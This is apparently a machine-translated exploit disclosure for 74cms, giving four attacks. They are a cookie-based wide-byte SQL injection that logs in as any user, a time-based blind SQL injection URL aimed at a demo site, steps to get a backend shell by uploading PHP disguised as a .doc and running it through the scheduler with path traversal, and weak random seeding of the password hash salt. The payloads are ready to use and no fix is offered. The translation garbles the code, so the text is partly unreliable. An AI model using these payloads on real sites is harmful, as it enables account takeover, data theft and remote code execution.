Server guard cms injection and shell in the background

0x1 arbitrary User Login
0x2 blind Injection
0x3 shell in the background
0x4 random function problems
Detailed description:
0x1 arbitrary User Login
User/login. php
Elseif (empty ($ _ SESSION ['uid']) | empty ($ _ SESSION ['username']) | empty ($ _ SESSION ['utype ']) & $ _ COOKIE ['qs'] ['username'] & $ _ COOKIE ['qs'] ['Password'] & $ _ COOKIE ['qs'] ['uid'])
{
If (check_cookie ($ _ COOKIE ['qs'] ['username'], $ _ COOKIE ['qs'] ['Password'])
{
Update_user_info ($ _ COOKIE ['qs'] ['uid'], false, false );
Header ("Location:". get_member_url ($ _ SESSION ['utype ']);
}
Else
{
Unset ($ _ SESSION ['uid'], $ _ SESSION ['username'], $ _ SESSION ['utype '], $ _ SESSION ['uqqid'], $ _ SESSION ['activate _ username'], $ _ SESSION ['activate _ email '], $ _ SESSION ["openid"]);
Setcookie ("QS [uid]", "", time ()-3600, $ QS_cookiepath, $ QS_cookiedomain );
Setcookie ('qs [username] ', "", time ()-3600, $ QS_cookiepath, $ QS_cookiedomain );
Setcookie ('qs [password] ', "", time ()-3600, $ QS_cookiepath, $ QS_cookiedomain );
Setcookie ("QS [utype]", "", time ()-3600, $ QS_cookiepath, $ QS_cookiedomain );
Header ("Location:". url_rewrite ('qs _ login '));
}
}
 
Include/fun_user.php
// Checks the COOKIE
Function check_cookie ($ name, $ pwd ){
Global $ db;
$ Row = $ db-> getone ("select count (*) AS num FROM ". table ('members '). "WHERE username = '{$ name}' and password = '{$ pwd }'");
If ($ row ['num']> 0)
{
Return true;
} Else {
Return false;
}
}
 
Construct the cookie as follows:
QS [uid] 2
QS [utype] 1
QS [password] 111111111111111111111
QS [username] % bf % 27 or 1 = 1% 23
Uid is the ID of a counterfeit user. utype is the user type password.
Www.2cto.com
 
 
0x2 blind Injection
Http://demo32.74cms.com//resume/resume-list.php? Key = test00 % bf ') /**/and + if (select/**/admin_name/**/from/**/qs_admin/**/limit/**/0, 1) = 0x61646D696E, benchmark (1000000000, (select/**/1), 1)/**/% 23
 
Both of the above are full-byte injection. If you can guess the administrator password and work out dual md5, you can also guess the background path and continue to look at the following
 
 
 
0x3 shell in the background
1. Disable the csrf protection function first.
2. Add a forged doc in the hr toolbox. The content is <? Php phpinfo () ;?>, Write down the path data/hrtools/2012/06/1339941553308.doc
3. Add a task to the tool-scheduler task, and enter..././data/hrtools/2012/06/1339941553308.doc for the script task.
4. Then execute
 
 
 
0x4 random function problems (almost negligible, purely personal YY)
In admin_common.fun.inc.php, $ QS_pwdhash is assigned a value during installation. If you can guess it, you no longer need to parse the double md5.
This $ QS_pwdhash is generated by randstr.
Function randstr ($ length = 6)
{
$ Hash = '';
$ Chars = 'abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz @#!~? :-= ';
$ Max = strlen ($ chars)-1;
Mt_srand (double) microtime () * 1000000 );
For ($ I = 0; $ I <$ length; $ I ++ ){
$ Hash. = $ chars [mt_rand (0, $ max)];
}
Return $ hash;
}
 
Generate a random number with a length of 6. If mt_srand () is the same as seeding, we will get the same random number, so we can guess it for a maximum of 1000000 times (egg pain)
Proof of vulnerability:
 
 
 
 
Solution:
Do it yourself ~
 
Author yy520